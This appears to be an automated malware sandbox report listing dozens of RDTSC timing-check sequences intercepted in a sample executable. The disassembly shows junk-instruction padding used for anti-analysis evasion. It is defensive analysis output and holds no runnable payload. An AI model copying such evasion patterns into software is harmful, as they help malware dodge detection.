Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2CB51 second address: D2CB55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2CB55 second address: D2CB63 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2BDC8ABB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2CF1A second address: D2CF1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2CF1F second address: D2CF2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2CFDC second address: D2CFE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2CFE2 second address: D2CFF5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2BDC8ABB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2CFF5 second address: D2CFFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2D107 second address: D2D10C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2D18E second address: D2D192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2D192 second address: D2D198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2D198 second address: D2D1C0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2BDCD5A7A8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], esi 0x0000000f mov ecx, dword ptr [ebp+12A22871h] 0x00000015 nop 0x00000016 jmp 00007F2BDCD5A7ACh 0x0000001b push eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 pop eax 0x00000021 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2D85A second address: D2D85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2D85E second address: D2D8A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jg 00007F2BDCD5A7A6h 0x0000000f popad 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 mov dword ptr [ebp+12BB5498h], ecx 0x0000001a push 0000001Eh 0x0000001c jmp 00007F2BDCD5A7ACh 0x00000021 push eax 0x00000022 pushad 0x00000023 pushad 0x00000024 jmp 00007F2BDCD5A7B2h 0x00000029 jns 00007F2BDCD5A7A6h 0x0000002f popad 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2DB77 second address: D2DB7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2DB7D second address: D2DB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2DCFF second address: D2DD4B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2BDC8ABB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F2BDC8ABB20h 0x00000011 nop 0x00000012 mov dword ptr [ebp+12A21BCAh], edx 0x00000018 lea eax, dword ptr [ebp+12BE4636h] 0x0000001e or cx, 4BACh 0x00000023 nop 0x00000024 jmp 00007F2BDC8ABB22h 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jo 00007F2BDC8ABB18h 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D2DD4B second address: D2DD51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D5D66B second address: D5D671 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D5D671 second address: D5D675 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D5D773 second address: D5D782 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2BDC8ABB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D5DB6D second address: D5DB77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F2BDCD5A7A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: CE94FC second address: CE9517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2BDC8ABB22h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D62692 second address: D626AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2BDCD5A7B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D626AA second address: D626B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F2BDC8ABB16h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D626B6 second address: D626BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D62C4F second address: D62C53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D62243 second address: D62247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D6319D second address: D631A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2BDC8ABB16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D631A9 second address: D631CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2BDCD5A7B8h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D631CD second address: D631F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jnl 00007F2BDC8ABB16h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F2BDC8ABB1Fh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F2BDC8ABB1Bh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D631F7 second address: D631FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D63459 second address: D63467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2BDC8ABB16h 0x0000000a push eax 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D63467 second address: D634B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F2BDCD5A7AEh 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F2BDCD5A7B5h 0x00000011 jmp 00007F2BDCD5A7B3h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e jng 00007F2BDCD5A7A6h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D634B2 second address: D634B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D686C5 second address: D686CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D686CB second address: D686D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2BDC8ABB16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D686D5 second address: D68705 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007F2BDCD5A7B2h 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 pop eax 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D68705 second address: D68709 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D68709 second address: D68711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D6889E second address: D688A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D688A4 second address: D688F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2BDCD5A7B9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F2BDCD5A7ADh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F2BDCD5A7A8h 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007F2BDCD5A7B4h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D68A8D second address: D68AB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2BDC8ABB20h 0x00000009 jmp 00007F2BDC8ABB23h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D68AB4 second address: D68AB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D68C45 second address: D68C4F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2BDC8ABB16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D6937C second address: D69380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D69380 second address: D69384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D69384 second address: D6939A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2BDCD5A7A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F2BDCD5A7AAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D6939A second address: D693A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D68392 second address: D683C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F2BDCD5A7BBh 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 jg 00007F2BDCD5A7A6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D683C0 second address: D683DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F2BDC8ABB23h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D683DE second address: D683E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D7122F second address: D71239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2BDC8ABB16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D71239 second address: D7124F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2BDCD5A7A6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jp 00007F2BDCD5A7A6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D70D85 second address: D70D89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D70D89 second address: D70DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F2BDCD5A7B8h 0x0000000d pop esi 0x0000000e push edx 0x0000000f jno 00007F2BDCD5A7B2h 0x00000015 js 00007F2BDCD5A7B2h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D70DC5 second address: D70DCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D70F08 second address: D70F14 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D79BAD second address: D79BB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D785BF second address: D785C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D78854 second address: D78858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D78858 second address: D7885D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D789FF second address: D78A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2BDC8ABB1Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D78A10 second address: D78A16 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D78A16 second address: D78A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D78A1F second address: D78A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D78A25 second address: D78A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2BDC8ABB16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D7CA12 second address: D7CA30 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jc 00007F2BDCD5A7A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jl 00007F2BDCD5A7A6h 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop esi 0x00000016 jl 00007F2BDCD5A7B2h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D7CA30 second address: D7CA36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D7C246 second address: D7C253 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jno 00007F2BDCD5A7A6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D7C4C8 second address: D7C4DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2BDC8ABB20h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D7C4DD second address: D7C4E2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D7FF8A second address: D7FFA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2BDC8ABB23h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D7FFA4 second address: D7FFE3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F2BDCD5A7B3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F2BDCD5A7B8h 0x00000013 pop eax 0x00000014 popad 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jnp 00007F2BDCD5A7A6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D7FFE3 second address: D7FFE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D80294 second address: D80299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D803D6 second address: D803FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB1Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2BDC8ABB25h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D803FB second address: D8040E instructions: 0x00000000 rdtsc 0x00000002 js 00007F2BDCD5A7A6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8040E second address: D80412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D80412 second address: D80420 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2BDCD5A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D89681 second address: D89687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D89687 second address: D8968B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8968B second address: D896B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB27h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F2BDC8ABB16h 0x00000013 jbe 00007F2BDC8ABB16h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D87C18 second address: D87C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D87C1E second address: D87C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D87C27 second address: D87C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D87C2D second address: D87C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D87C31 second address: D87C64 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2BDCD5A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007F2BDCD5A7BEh 0x00000017 jmp 00007F2BDCD5A7B8h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D87C64 second address: D87C6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D87C6A second address: D87C86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D87C86 second address: D87C90 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2BDC8ABB1Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D87F74 second address: D87F8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 jnc 00007F2BDCD5A7AAh 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D87F8C second address: D87F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D88264 second address: D88269 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
